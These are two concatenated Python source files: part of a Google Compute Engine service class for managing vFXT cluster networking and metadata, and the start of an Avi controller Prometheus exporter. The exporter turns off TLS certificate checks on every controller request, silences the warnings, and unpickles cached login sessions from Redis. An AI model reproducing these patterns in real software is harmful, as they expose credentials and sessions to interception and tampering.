return _gce_do(conn.networks().get, project=self.network_project_id, network=self.network_id)
def _get_subnetworks(self, region=None):
'''Get the subnetworks from the network object
Arguments:
region (str, optional): return only the subnetworks in the provided region
'''
network_data = self._get_network()
if 'subnetworks' not in network_data:
return []
subnetworks = []
conn = self.connection()
for sn in network_data['subnetworks']:
sn_region = sn.split('/')[-3]
sn_name = sn.split('/')[-1]
# Why would this ever fail? Well it looks like subnets
# can be listed that are hidden based on serverless services
# that are managed for the customer
try:
subnetwork = _gce_do(conn.subnetworks().get,
project=self.network_project_id,
region=sn_region, subnetwork=sn_name)
subnetworks.append(subnetwork)
except Exception as e:
log.error(e)
if region:
subnetworks = [_ for _ in subnetworks if _['region'].endswith(region)]
return subnetworks
def _get_metadata(self, instance, key):
'''Retrieve the value of a key from the instance metadata
Arguments:
instance (obj): backend instance object
key (str): key to lookup
Returns: value or None
'''
if 'items' not in instance['metadata']:
return None
items = instance['metadata']['items']
try:
value = [i['value'] for i in items if i['key'] == key][0]
log.debug("Fetched metadata {}={}".format(key, value))
return value
except Exception:
log.debug("No such metadata key:{}".format(key))
return None
def _delete_metadata(self, instance, key):
'''Delete a key from the instance metadata and sync with the backend
Arguments:
instance (obj): backend instance object
key (str): key to delete
'''
if 'items' not in instance['metadata']:
return
conn = self.connection()
metadata = instance['metadata']
zone = instance['zone'].split('/')[-1]
items = metadata['items']
existing = [idx for idx, i in enumerate(items) if i['key'] == key]
if existing:
del metadata['items'][existing[0]]
response = _gce_do(conn.instances().setMetadata,
project=self.project_id,
zone=zone,
instance=instance['name'],
body=metadata)
self._wait_for_operation(response, msg='metadata to be deleted', zone=zone)
def _set_metadata(self, instance, key, value):
'''Set a key from the instance metadata and sync with the backend
Arguments:
instance (obj): backend instance object
key (str): key to set
value (str): value of key
'''
if 'items' not in instance['metadata']:
instance['metadata']['items'] = []
conn = self.connection()
zone = instance['zone'].split('/')[-1]
metadata = instance['metadata']
items = metadata['items']
existing = [(idx, i['value']) for idx, i in enumerate(items) if i['key'] == key]
if existing:
idx, oldvalue = existing[0]
metadata['items'][idx]['value'] = value
log.debug("Updated metadata key:{}={} (from {})".format(key, value, oldvalue))
else:
metadata['items'].append(dict(key=key, value=value))
log.debug("Setting metadata key:{}={}".format(key, value))
response = _gce_do(conn.instances().setMetadata,
project=self.project_id,
zone=zone,
instance=instance['name'],
body=metadata)
self._wait_for_operation(response, msg='metadata to be set', zone=zone)
def valid_bucketname(self, name):
'''Validate the instance name
Returns: bool
'''
if not ServiceBase.valid_bucketname(self, name):
return False
if name.startswith('goog'):
return False
disallowed = ['google', 'gogle', 'googgle', 'g00gle', 'goog1e']
if all([s not in name for s in disallowed]):
return True
return False
def valid_instancename(self, name):
'''Validate the instance name
Returns: bool
'''
if not ServiceBase.valid_instancename(self, name):
return False
if not name or len(name) > 63:
return False
if self.INSTANCENAME_RE.match(name):
return True
return False
def _zone_machine_types(self):
'''Get a mapping of zones and their supported machine types
Returns: dict zone:[types]
'''
response = _gce_do(self.connection().machineTypes().aggregatedList, project=self.project_id)
return {zone_name.split('/')[1]: [mt['name'] for mt in zone_data.get('machineTypes', [])] for zone_name, zone_data in response['items'].items()}
def _zone_names(self, all_regions=True):
'''Get a list of zone names
Arguments:
all_regions (bool, optional): return zones for all regions, True
Returns: list
'''
if not hasattr(self.local, '_zone_names'):
conn = self.connection()
self.local._zone_names = list(self.zones)
regions = _gce_do(conn.regions().list, project=self.project_id)['items']
all_zones = [zone.split('/')[-1] for region in regions if 'zones' in region for zone in region['zones']]
self.local._zone_names.extend([_ for _ in all_zones if _ not in self.zones])
if all_regions:
return self.local._zone_names
else:
region = self._zone_to_region(self.zones[0])
return [_ for _ in self.local._zone_names if _.startswith(region)]
def _zone_to_region(self, zone):
'''Return the name of the region for a given zone
This is typically just zone[:-2]
Arguments:
zone (str): name of the zone
'''
conn = self.connection()
regions = _gce_do(conn.regions().list, project=self.project_id)['items']
for r in regions:
zone_url = '{}/{}/zones/{}'.format(self.GCE_URL, self.project_id, zone)
if zone_url in r.get('zones', []):
return r['name']
raise vFXTConfigurationException("Invalid zone: {}".format(zone))
def _gs_get_object(self, bucket, obj, fh, chunksize=1024 * 1024):
'''Fetch an object from a bucket
Arguments:
bucket (str): bucket name
obj (str): object name
fh: filehandle (any io.IOBase derived filehandle, even StringIO
chunksize: size of download chunks
'''
log.debug("Fetching {} from bucket {}".format(obj, bucket))
c = self.connection(connection_type='storage')
req = c.objects().get_media(bucket=bucket, object=obj)
downloader = googleapiclient.http.MediaIoBaseDownload(fh, req, chunksize)
done = False
errors = 0
while not done:
try:
status, done = downloader.next_chunk()
if status:
log.debug("{:>3}% of {} downloaded".format(status.progress() * 100, obj))
except googleapiclient.http.HttpError as e:
if int(e.resp['status']) < 500:
raise_from(vFXTServiceFailure("Failed to fetch object {}: {}".format(obj, e)), e)
errors += 1
time.sleep(backoff(errors))
except Exception as e:
errors += 1
time.sleep(backoff(errors))
def _gs_fetch(self, url, filename):
'''Retrieve the object from google storage, writing it to the passed in file location
Arguments:
url (str): gs:// url
filename (str): name of destination file (absolute path)
Returns: Nothing
Raises:
googleapiclient.errors.HttpError
'''
bkt = None
obj = None
log.debug("Fetching {} to {}".format(url, filename))
try:
m = self.GSURL_RE.match(url)
if not m:
raise Exception('Match failed')
bkt = m.groups()[0]
obj = m.groups()[1]
if not bkt and obj:
raise Exception('Both bucket and object not parsed')
except Exception as e:
log.debug("Failed parsing google storage url: {}".format(e))
raise_from(vFXTConfigurationException("Invalid google storage URL: {}".format(url)), e)
sig_file = filename + '.sig'
sig_obj = obj + '.sig'
try:
# does sig exist
if os.access(sig_file, os.F_OK) and os.access(filename, os.F_OK):
tmp = sig_file + '.tmp'
with open(tmp, 'wb') as f:
self._gs_get_object(bkt, sig_obj, f)
sig_cmp = filecmp.cmp(sig_file, tmp)
os.unlink(tmp)
if sig_cmp: # we got it
log.debug("Signature {} up to date".format(sig_obj))
return # bail, nothing to be done
except googleapiclient.errors.HttpError:
pass
# fetch sig for future comparison
try:
with open(sig_file, 'wb') as f:
self._gs_get_object(bkt, sig_obj, f)
except Exception as e:
log.debug(e)
try:
os.unlink(sig_file)
except Exception as cleanup_e:
log.debug("Failed to cleanup {}: {}".format(sig_file, cleanup_e))
# get the actual file
try:
with open(filename, 'wb') as f:
self._gs_get_object(bkt, obj, f)
except Exception as e:
log.debug(e)
try:
os.unlink(filename)
except Exception as cleanup_e:
log.debug("Failed to cleanup {}: {}".format(filename, cleanup_e))
raise
def _destroy_installation_image(self, image):
'''Destroy an installation image
Arguments:
name (str): name of the cloud image
'''
log.info("Destroying image {}".format(image))
try:
r = _gce_do(self.connection().images().delete, project=self.project_id, image=image)
self._wait_for_operation(r, msg='image to be deleted', op_type='globalOperations')
except Exception as e:
raise_from(vFXTServiceFailure("Failed to destroy image {}: {}".format(image, e)), e)
def add_instance_address(self, instance, address, **options):
'''Add a new route to the instance
Arguments:
instance: backend instance
address (str): IP address
allow_reassignment (bool, optional): defaults to True
priority (int, optional): priority (lower value is higher), defaults to 900
'''
conn = self.connection()
addr = Cidr('{}/32'.format(address)) # validates
dest = '{}/32'.format(addr.address)
zone = instance['zone'].split('/')[-1]
network = self._get_network()
try:
# need to check network/subnetwork ranges, if this address falls within those ranges
# we can use the ip alias feature... otherwise we fall back to the route approach.
ipalias_ranges = []
subnetwork = None
if self.subnetwork_id:
subnetwork = self._get_subnetwork(self.subnetwork_id)
if not subnetwork:
subnetwork_region = self._zone_to_region(zone)
subnetworks = self._get_subnetworks(subnetwork_region)
if subnetworks: # no subnetwork specified, but we have them so use one
subnetwork = subnetworks[0]
if subnetwork:
if 'ipCidrRange' in subnetwork:
ipalias_ranges.append(subnetwork.get('ipCidrRange'))
for subrange in subnetwork.get('secondaryIpRanges', []):
if 'ipCidrRange' in subrange:
ipalias_ranges.append(subrange.get('ipCidrRange'))
if any([Cidr(_).contains(address) for _ in ipalias_ranges]):
nic = instance['networkInterfaces'][0] # XXX only care about the first iface
aliases = nic.get('aliasIpRanges', [])
if dest in [_['ipCidrRange'] for _ in aliases]:
raise vFXTConfigurationException("Address already assigned: {}".format(address))
aliases.append({'ipCidrRange': dest})
nic['aliasIpRanges'] = aliases
other_instance = self._who_has_ip(address)
if other_instance:
log.debug("{} has {}, removing".format(other_instance['name'], address))
self.remove_instance_address(other_instance, address)
log.debug('Adding instance address body {}'.format(nic))
resp = _gce_do(conn.instances().updateNetworkInterface, instance=instance['name'], project=self.project_id, zone=zone, networkInterface=nic['name'], body=nic)
self._wait_for_operation(resp, msg='IP Alias configuration', zone=zone)
else: # XXX or fall back to routes
# check for existing
dest_filter = 'destRange eq {}'.format(dest)
resp = _gce_do(conn.routes().list, project=self.network_project_id, filter=dest_filter)
if 'items' in resp:
existing = resp['items']
network_selflink = network['selfLink']
# if we are the next hop instance for a route in our current network
if instance['selfLink'] in [_['nextHopInstance'] for _ in existing if _['network'] == network_selflink and 'nextHopInstance' in _]:
raise vFXTConfigurationException("Instance already has a route for this address: {}".format(dest))
if not options.get('allow_reassignment', True):
raise vFXTConfigurationException("Route already assigned: {}".format(existing))
for route in existing:
log.debug("Deleting route {}".format(route['name']))
resp = _gce_do(conn.routes().delete, project=self.network_project_id, route=route['name'])
self._wait_for_operation(resp, msg='route to be deleted', op_type='globalOperations')
# add the route
body = {
'name': '{}-{}'.format(self.name(instance), addr.address.replace('.', '-')),
'network': network['selfLink'],
'nextHopInstance': instance['selfLink'],
'destRange': dest,
'priority': options.get('priority') or 900,
}
log.debug('Adding instance address body {}'.format(body))
resp = _gce_do(conn.routes().insert, project=self.network_project_id, body=body)
self._wait_for_operation(resp, msg='route to be created', op_type='globalOperations')
except vFXTConfigurationException as e:
raise
except Exception as e:
raise_from(vFXTServiceFailure("Failed to add address: {}".format(e)), e)
def remove_instance_address(self, instance, address):
'''Remove an instance route address
Arguments:
instance: backend instance
address (str): IP address
Raises: vFXTServiceFailure
'''
conn = self.connection()
addr = Cidr('{}/32'.format(address)) # validates
dest = '{}/32'.format(addr.address)
zone = instance['zone'].split('/')[-1]
try:
nic = instance['networkInterfaces'][0]
aliases = nic.get('aliasIpRanges', [])
if dest not in [_['ipCidrRange'] for _ in nic.get('aliasIpRanges', [])]:
# XXX or fall back on routes
expr = 'destRange eq {}'.format(dest)
routes = _gce_do(conn.routes().list, project=self.network_project_id, filter=expr)
if not routes or 'items' not in routes:
#raise vFXTConfigurationException("No route was found for {}".format(addr.address))
raise vFXTConfigurationException("Address not assigned via routes: {}".format(address))
for route in routes['items']:
if instance['selfLink'] != route['nextHopInstance']:
log.warning("Skipping route destined for other host: {} -> {}".format(address, route['nextHopInstance']))
continue
log.debug("Deleting route {}".format(route['name']))
resp = _gce_do(conn.routes().delete, project=self.network_project_id, route=route['name'])
self._wait_for_operation(resp, msg='route to be deleted', op_type='globalOperations')
return
# prune the ip aliases
nic['aliasIpRanges'] = [_ for _ in aliases if _['ipCidrRange'] != dest]
resp = _gce_do(conn.instances().updateNetworkInterface, instance=instance['name'], project=self.project_id, zone=zone, networkInterface=nic['name'], body=nic)
self._wait_for_operation(resp, msg='IP Alias configuration', zone=zone)
except vFXTConfigurationException as e:
raise
except Exception as e:
raise_from(vFXTServiceFailure("Failed to remove address: {}".format(e)), e)
def instance_in_use_addresses(self, instance, category='all'):
'''Get the in use addresses for the instance
Arguments:
instance: backend instance
category (str): all, instance, routes
To obtain the public instance address, use 'public' category. This
is not included with 'all'.
'''
addresses = set()
if category in ['all', 'instance']:
for interface in instance['networkInterfaces']:
interface_address = interface.get('networkIP')
if interface_address:
addresses.add(interface_address)
if 'aliasIpRanges' in interface:
ip_aliases = interface.get('aliasIpRanges')
for ip_alias in ip_aliases:
# we don't need to support ranges here... that just means they are auto assigned
# and not a specific address
# addresses.update(set(Cidr.expand_address_range(cidr_alias.start_address(), cidr_alias.end_address())))
if '/' in ip_alias['ipCidrRange'] and ip_alias['ipCidrRange'].split('/')[-1] != '32':
continue
addresses.add(ip_alias['ipCidrRange'].split('/')[0])
if category in ['all', 'routes']:
search = 'nextHopInstance eq .*/{}'.format(instance['name'])
conn = self.connection()
resp = _gce_do(conn.routes().list, project=self.network_project_id, filter=search)
if resp and 'items' in resp:
network_selflink = self._get_network()['selfLink']
for route in resp['items']:
addr = route['destRange'].split('/')[0]
if addr == '0.0.0.0': # gw/default
continue
# if this route is for a different network, ignore it
if route['network'] != network_selflink:
continue
addresses.add(addr)
# for special requests
if category == 'public':
for interface in instance['networkInterfaces']:
try:
nat_addresses = [_['natIP'] for _ in interface['accessConfigs']]
addresses.update(set(nat_addresses))
except Exception:
pass
return list(addresses)
def _add_tag(self, instance, tag):
'''Add a tag to an instance
'''
conn = self.connection()
zone = instance['zone'].split('/')[-1]
instance = self.refresh(instance)
tags = instance['tags']
if 'items' not in tags:
tags['items'] = []
tags['items'].append(tag)
response = _gce_do(conn.instances().setTags,
project=self.project_id,
zone=zone,
instance=instance['name'],
body=tags)
self._wait_for_operation(response, msg='tags to be set', zone=zone)
def _remove_tag(self, instance, tag):
'''Remove a tag from an instance
'''
conn = self.connection()
zone = instance['zone'].split('/')[-1]
instance = self.refresh(instance)
tags = instance['tags']
if 'items' not in tags:
tags['items'] = []
if tag not in tags['items']:
return
tags['items'] = [_ for _ in tags['items'] if _ != tag]
response = _gce_do(conn.instances().setTags,
project=self.project_id,
zone=zone,
instance=instance['name'],
body=tags)
self._wait_for_operation(response, msg='tags to be set', zone=zone)
def _cache_to_disk_config(self, cache_size, machine_type=None, disk_type=None): #pylint: disable=unused-argument
'''For a given cache size, output the default data disk count and size
Arguments:
cache_size (int): vFXT cluster node cache size in GB
machine_type (str, optional): vFXT cluster node machine type
disk_type (str, optional): vFXT cluster node disk type
Returns:
tuple (disk count, size per disk)
'''
if disk_type == 'local-ssd':
if cache_size > 3000: # 375GB max 8 disks
raise vFXTConfigurationException("{} is larger than 3000GB, the maximum size for local-ssd disks".format(cache_size))
count = int(cache_size / 375)
if (cache_size % 375) != 0:
count += 1
return (count, 375)
return tuple([1, cache_size])
def _get_default_image(self):
'''Get the default image from the defaults
This may not be available if we are unable to fetch the defaults.
'''
try:
return self.defaults['machineimages']['current']
except Exception:
raise vFXTConfigurationException("You must provide a root disk image.")
def _disable_disk_auto_delete(self, instance, disk_name):
'''Disable disk auto delete flag
Arguments:
instance: backend instance
disk_name (str): disk name
'''
conn = self.connection()
instance_zone = instance['zone'].split('/')[-1]
op = _gce_do(conn.instances().setDiskAutoDelete,
project=self.project_id,
zone=instance_zone,
instance=instance['name'],
deviceName=disk_name,
autoDelete=False)
self._wait_for_operation(op, msg='auto delete attribute to be disabled', zone=instance_zone)
def _get_subnetwork(self, subnetwork): #pylint: disable=inconsistent-return-statements
'''Get the labeled subnetwork
Arguments:
subnetwork (str): subnetwork identifier
This must be in one of the following form:
"foo"
"projects/project-foo/regions/us-east1/subnetworks/foo"
'''
if not subnetwork:
raise vFXTConfigurationException("You must specify a subnetwork name")
parts = subnetwork.split('/')
if len(parts) not in [1, 6]:
raise vFXTConfigurationException("Invalid subnetwork name: {}".format(subnetwork))
conn = self.connection()
try:
if len(parts) == 1:
subnetwork_region = self._zone_to_region(self.zones[0])
subnetworks = [_ for _ in self._get_subnetworks(subnetwork_region) if _['name'] == subnetwork]
if not subnetworks:
raise Exception('No such subnetwork')
return subnetworks[0]
elif len(parts) == 6:
project = parts[1]
region = parts[3]
name = parts[5]
return _gce_do(conn.subnetworks().get, project=project, region=region, subnetwork=name)
else:
raise Exception("Unknown subnetwork configuration")
except Exception as e:
log.debug("Failed to find subnetwork {}: {}".format(subnetwork, e))
raise_from(vFXTConfigurationException("Failed to find subnetwork {}: {}".format(subnetwork, e)), e)
def _who_has_ip(self, address):
'''Helper to determine which instance owns a particular IP address
'''
conn = self.connection()
# NOTE this has to iterate through all of the instances and examine the network interface
# ip addresses (or associated routes if the address does not fall within the
# network). Awaiting a better API for this, see
# https://issuetracker.google.com/issues/35905011
# https://issuetracker.google.com/issues/73455339
# lookup is instance if the address is not a routeable address, otherwise we also query routes with all
category = 'instance' if self._cidr_overlaps_network('{}/32'.format(address)) else 'all'
# look in all zones in the current region, starting with our current zones
zones = list(self.zones)
for zone in self._zone_names(all_regions=False):
if zone not in zones:
zones.append(zone)
for zone in zones:
page_token = None
while True:
try:
r = _gce_do(conn.instances().list, project=self.project_id, zone=zone, pageToken=page_token)
if not r or 'items' not in r:
break
for instance in r['items']:
if address in self.instance_in_use_addresses(instance, category):
return instance
page_token = r.get('nextPageToken')
if not page_token:
break
except Exception as e:
log.debug("_who_has_ip instance fetch failed: {}".format(e))
break
return None
def _get_network_project(self):
if self.project_id:
xpn_project = _gce_do(self.connection().projects().getXpnHost, project=self.project_id).get('name')
if xpn_project:
log.debug("Using {} for network project".format(xpn_project))
return xpn_project
return self.project_id
else:
return None
def _gce_do(f, retries=ServiceBase.CLOUD_API_RETRIES, **options):
'''GCE function call wrapper with variable retries
Arguments:
f (function): function to call
retries (int, optional): number of retries
**options: options to pass to the function
Returns: Returns the function call
Raises: vFXTServiceFailure, vFXTServiceTimeout
'''
errors = 0
while True:
try:
return f(**options).execute()
except googleapiclient.errors.HttpError as e:
if int(e.resp['status']) < 500:
raise_from(vFXTServiceFailure(e), e)
errors += 1
time.sleep(backoff(errors))
if retries == 0:
raise_from(vFXTServiceTimeout('{} failed, exhausted retries: {}'.format(f.__name__, e)), e)
except Exception as e:
log.debug("Unknown GCE retry-able function call failure: {}".format(e))
retries -= 1
if retries == 0:
raise vFXTServiceTimeout('{} failed, exhausted retries: {}'.format(f.__name__, e))
time.sleep(Service.POLLTIME)
|
prometheus_exporter.py
|
import json, requests, urllib3
from flask import Flask, request, jsonify
from datetime import datetime
import time
import traceback
import os
import redis
import cPickle as pickle
import virtualservice_static
import serviceengine_static
import servicediscovery
import pool_static
import controller_static
from multiprocessing import Process
if hasattr(requests.packages.urllib3, 'disable_warnings'):
requests.packages.urllib3.disable_warnings()
if hasattr(urllib3, 'disable_warnings'):
urllib3.disable_warnings()
#------------------------------------
avi_controller = os.environ['AVICONTROLLER']
avi_user = os.environ['AVIUSER']
avi_pass = os.environ['AVIPASSWORD']
#------------------------------------
#----- entity lists greater than this value will be replaced with wildcard
#----- interval in seconds to refresh the metrics cache
if 'EN_METRIC_REFRESH_INTERVAL' in os.environ:
metric_refresh_interval = int(os.environ['EN_METRIC_REFRESH_INTERVAL'])
if metric_refresh_interval < 60:
metric_refresh_interval = 60
else:
metric_refresh_interval = 300
#----- When refreshing cache, if wait is true the cache is refreshed first before returning metrics
#----- if wait is False, metrics from current cache are returned and then the cache is refreshed
#----- set to false if very large config resulting in timeouts while cache is being refreshed
if 'EN_WAIT_FOR_CACHE' in os.environ:
wait_for_cache = os.environ['EN_WAIT_FOR_CACHE'].lower()
if 'false' in wait_for_cache:
wait_for_cache = False
else:
wait_for_cache = True
else:
wait_for_cache = True
#------------------------------------
#----- Default List of Metrics for each entity type
default_vs_metric_list = [
'l4_client.apdexc',
'l4_client.avg_bandwidth',
'l4_client.avg_application_dos_attacks',
'l4_client.avg_complete_conns',
'l4_client.avg_connections_dropped',
'l4_client.avg_new_established_conns',
'l4_client.avg_policy_drops',
'l4_client.avg_rx_pkts',
'l4_client.avg_tx_pkts',
'l4_client.avg_rx_bytes',
'l4_client.avg_tx_bytes',
'l4_client.max_open_conns',
'l4_client.avg_lossy_connections',
'l7_client.avg_complete_responses',
'l7_client.avg_client_data_transfer_time',
'l7_client.avg_client_txn_latency',
'l7_client.sum_application_response_time',
'l7_client.avg_resp_4xx_avi_errors',
'l7_client.avg_resp_5xx_avi_errors',
'l7_client.avg_resp_2xx',
'l7_client.avg_resp_4xx',
'l7_client.avg_resp_5xx',
'l4_client.avg_total_rtt',
'l7_client.avg_page_load_time',
'l7_client.apdexr',
'l7_client.avg_ssl_handshakes_new',
'l7_client.avg_ssl_connections',
'l7_client.sum_get_reqs',
'l7_client.sum_post_reqs',
'l7_client.sum_other_reqs',
'l7_client.avg_frustrated_responses',
'l7_client.avg_waf_attacks',
'l7_client.pct_waf_attacks',
'l7_client.sum_total_responses',
'l7_client.avg_waf_rejected',
'l7_client.avg_waf_evaluated',
'l7_client.avg_waf_matched',
'l7_client.avg_waf_disabled',
'l7_client.pct_waf_disabled',
'l7_client.avg_http_headers_count',
'l7_client.avg_http_headers_bytes',
'l7_client.pct_get_reqs',
'l7_client.pct_post_reqs',
'l7_client.avg_http_params_count',
'l7_client.avg_uri_length',
'l7_client.avg_post_bytes',
'dns_client.avg_complete_queries',
'dns_client.avg_domain_lookup_failures',
'dns_client.avg_tcp_queries',
'dns_client.avg_udp_queries',
'dns_client.avg_udp_passthrough_resp_time',
'dns_client.avg_unsupported_queries',
'dns_client.pct_errored_queries',
'dns_client.avg_domain_lookup_failures',
'dns_client.avg_avi_errors',
'dns_server.avg_complete_queries',
'dns_server.avg_errored_queries',
'dns_server.avg_tcp_queries',
'dns_server.avg_udp_queries',
'l4_server.avg_rx_pkts',
'l4_server.avg_tx_pkts',
'l4_server.avg_rx_bytes',
'l4_server.avg_tx_bytes',
'l4_server.avg_bandwidth',
'l7_server.avg_complete_responses',
'l4_server.avg_new_established_conns',
'l4_server.avg_pool_open_conns',
'l4_server.avg_pool_complete_conns',
'l4_server.avg_open_conns',
'l4_server.max_open_conns',
'l4_server.avg_errored_connections',
'l4_server.apdexc',
'l4_server.avg_total_rtt',
'l7_server.avg_resp_latency',
'l7_server.apdexr',
'l7_server.avg_application_response_time',
'l7_server.pct_response_errors',
'l7_server.avg_frustrated_responses',
'l7_server.avg_total_requests',
'healthscore.health_score_value'
]
default_vs_metric_list = ','.join(default_vs_metric_list)
#------
default_se_metric_list = [
'se_if.avg_bandwidth',
'se_stats.avg_connection_mem_usage',
'se_stats.avg_connections',
'se_stats.avg_connections_dropped',
'se_stats.avg_cpu_usage',
'se_stats.avg_disk1_usage',
'se_stats.avg_mem_usage',
'se_stats.avg_dynamic_mem_usage',
'se_stats.avg_persistent_table_usage',
'se_stats.avg_rx_bandwidth',
'se_if.avg_rx_bytes',
'se_if.avg_rx_pkts',
'se_if.avg_rx_pkts_dropped_non_vs',
'se_if.avg_tx_pkts',
'se_if.avg_tx_bytes',
'se_stats.avg_ssl_session_cache_usage',
'se_if.avg_connection_table_usage',
'se_stats.max_se_bandwidth',
'se_stats.avg_eth0_bandwidth',
'se_stats.pct_syn_cache_usage',
'se_stats.avg_packet_buffer_usage',
'se_stats.avg_packet_buffer_header_usage',
'se_stats.avg_packet_buffer_large_usage',
'se_stats.avg_packet_buffer_small_usage',
'healthscore.health_score_value'
]
default_se_metric_list = ','.join(default_se_metric_list)
#------
default_controller_metric_list = [
'controller_stats.avg_cpu_usage',
'controller_stats.avg_disk_usage',
'controller_stats.avg_mem_usage'
]
default_controller_metric_list = ','.join(default_controller_metric_list)
#----
default_pool_metric_list = [
'l4_server.avg_rx_pkts',
'l4_server.avg_tx_pkts',
'l4_server.avg_rx_bytes',
'l4_server.avg_tx_bytes',
'l4_server.avg_bandwidth',
'l7_server.avg_complete_responses',
'l4_server.avg_new_established_conns',
'l4_server.avg_pool_open_conns',
'l4_server.avg_pool_complete_conns',
'l4_server.avg_open_conns',
'l4_server.max_open_conns',
'l4_server.avg_errored_connections',
'l4_server.apdexc',
'l4_server.avg_total_rtt',
'l7_server.avg_resp_latency',
'l7_server.apdexr',
'l7_server.avg_application_response_time',
'l7_server.pct_response_errors',
'l7_server.avg_frustrated_responses',
'l7_server.avg_total_requests',
'healthscore.health_score_value'
]
default_pool_metric_list = ','.join(default_pool_metric_list)
#------------------------------------
def avi_login():
global login
try:
if r.get('avi_login') == None:
login = requests.post('https://%s/login' %avi_controller, verify=False, data={'username': avi_user, 'password': avi_pass},timeout=15)
r.set('avi_login',pickle.dumps(login))
return login
else:
cookies=dict()
login = pickle.loads(r.get('avi_login'))
if 'avi-sessionid' in login.cookies.keys():
cookies['avi-sessionid'] = login.cookies['avi-sessionid']
else:
cookies['sessionid'] = login.cookies['sessionid']
headers = ({"X-Avi-Tenant": "admin", 'content-type': 'application/json'})
resp = requests.get('https://%s/api/cluster' %avi_controller, verify=False, headers = headers,cookies=cookies,timeout=5)
if resp.status_code == 200:
return login
else:
login = requests.post('https://%s/login' %avi_controller, verify=False, data={'username': avi_user, 'password': avi_pass},timeout=15)
r.set('avi_login',pickle.dumps(login))
return login
except:
login = requests.post('https://%s/login' %avi_controller, verify=False, data={'username': avi_user, 'password': avi_pass},timeout=15)
r.set('avi_login',pickle.dumps(login))
return login
def avi_request(avi_api,tenant,api_version='17.2.1'):
cookies=dict()
if 'avi-sessionid' in login.cookies.keys():
cookies['avi-sessionid'] = login.cookies['avi-sessionid']
else:
cookies['sessionid'] = login.cookies['sessionid']
headers = ({'X-Avi-Tenant': '%s' %tenant, 'content-type': 'application/json', 'X-Avi-Version': '%s' %api_version})
return requests.get('https://%s/api/%s' %(avi_controller,avi_api), verify=False, headers = headers,cookies=cookies,timeout=50)
def avi_post(api_url,tenant,payload,api_version='17.2.1'):
cookies=dict()
if 'avi-sessionid' in login.cookies.keys():
cookies['avi-sessionid'] = login.cookies['avi-sessionid']
else:
cookies['sessionid'] = login.cookies['sessionid']
headers = ({"X-Avi-Tenant": "%s" %tenant, 'content-type': 'application/json','referer': 'https://%s' %avi_controller, 'X-CSRFToken': dict(login.cookies)['csrftoken'],'X-Avi-Version':'%s' %api_version})
cookies['csrftoken'] = login.cookies['csrftoken']
return requests.post('https://%s/api/%s' %(avi_controller,api_url), verify=False, headers = headers,cookies=cookies, data=json.dumps(payload),timeout=50)
def remove_version_specific_metrics(entity_type,metric_list):
try:
#----- Generate List of Available Metrics
if r.get('available_metrics_last_poll_time') == None:
r.set('available_metrics_last_poll_time', (time.time()-3601))
if r.get('metric_id_polling') == None:
r.set('metric_id_polling', 'False')
if (time.time() - float(r.get('available_metrics_last_poll_time')) > 3600 or r.get('available_metrics') == None) and r.get('metric_id_polling') == 'False':
r.set('metric_id_polling', 'True')
resp = avi_request('analytics/metric_id',login.json()['tenants'][0]['name']).json()
_available_metrics = {}
for m in resp['results']:
_available_metrics[m['name']]=m['entity_types']
r.set('available_metrics', pickle.dumps(_available_metrics))
r.set('available_metrics_last_poll_time', time.time())
r.set('metric_id_polling', 'False')
available_metrics = pickle.loads(r.get('available_metrics'))
_metrics = metric_list.replace(' ','').split(',')
_metric_list = []
if entity_type == 'virtualservice':
for m in _metrics:
if m.lower() in available_metrics:
if 'virtualservice' in available_metrics[m.lower()]:
_metric_list.append(m)
elif entity_type == 'serviceengine':
for m in _metrics:
if m.lower() in available_metrics:
if 'serviceengine' in available_metrics[m.lower()]:
_metric_list.append(m)
elif entity_type == 'pool':
for m in _metrics:
if m.lower() in available_metrics:
if 'pool' in available_metrics[m.lower()]:
_metric_list.append(m)
elif entity_type == 'controller':
for m in _metrics:
if m.lower() in available_metrics:
if 'cluster' in available_metrics[m.lower()]:
_metric_list.append(m)
_metric_list = ','.join(_metric_list)
return _metric_list
except:
r.set('metric_id_polling', 'False')
print(str(datetime.now())+' '+avi_controller+': remove_version_specific_metrics encountered an error')
exception_text = traceback.format_exc()
print(str(datetime.now())+' '+avi_controller+': '+exception_text)
#----------
def generate_params_list(request):
d=request.args.to_dict()
tenant_list = []
all_tenants = []
ten_inv = avi_request('tenant?fields=name&page_size=200','admin')
if ten_inv.status_code != 403:
resp = ten_inv.json()
page_number = 1
while 'next' in resp:
page_number += 1
resp = avi_request('tenant?fields=name&page_size=200&page='+str(page_number),'admin').json()
for v in resp['results']:
ten_inv.json()['results'].append(v)
for t in ten_inv.json()['results']:
all_tenants.append(t['name'])
else:
for t in login.json()['tenants']:
all_tenants.append(t['name'])
if 'tenant' in d:
for t in all_tenants:
if t.lower() in request.args.get('tenant').lower().split(','):
tenant_list.append(t)
else:
for t in all_tenants:
tenant_list.append(t)
if 'cloud' in d:
cloud_list = request.args.get('cloud').lower().split(',')
else:
cloud_list = ['*']
if 'entity_uuid' in d:
uuid_list = request.args.get('entity_uuid').lower().split(',')
else:
uuid_list = '*'
r.set('tenant_list', pickle.dumps(all_tenants))
return tenant_list,cloud_list, uuid_list
#---------------------------------------------------------------------------------------------------------
#-----------------------------------
#----- Service engine statistics
#----- build lists for requested params, allows for multiple jobs servers to scrape different metrics
def serviceengine_metrics_params(request):
if r.get('se_entity_uuid') == None:
r.set('se_entity_uuid',pickle.dumps({}))
if r.get('se_metric_id') == None:
r.set('se_metric_id',pickle.dumps({}))
if r.get('se_tenant') == None:
r.set('se_tenant',pickle.dumps({}))
if r.get('se_cloud') == None:
r.set('se_cloud',pickle.dumps({}))
if r.get('se_runtime') == None:
r.set('se_runtime',pickle.dumps({}))
d=request.args.to_dict()
tenant_list,cloud_list,uuid_list = generate_params_list(request)
if 'metric_id' in d:
metric_id = request.args.get('metric_id').lower()
else:
metric_id = default_se_metric_list
se_metric_list = remove_version_specific_metrics('serviceengine',metric_id)
_metric_list = se_metric_list.split(',')
#---- define metric id list
_se_metric_id = pickle.loads(r.get('se_metric_id'))
for m in _metric_list:
_se_metric_id[m] = time.time()
_removal = []
for m in _se_metric_id:
if (time.time() - _se_metric_id[m]) > (metric_refresh_interval*2):
_removal.append(m)
for m in _removal:
_se_metric_id.pop(m, None)
r.set('se_metric_id', pickle.dumps(_se_metric_id))
#---- define tenant list
_tenant_dict = pickle.loads(r.get('se_tenant'))
for t in tenant_list:
_tenant_dict[t] = time.time()
_removal = []
for t in _tenant_dict:
if (time.time() - _tenant_dict[t]) > (metric_refresh_interval*2):
_removal.append(t)
for t in _removal:
_tenant_dict.pop(t, None)
r.set('se_tenant', pickle.dumps(_tenant_dict))
#---- define se runtime for tenant
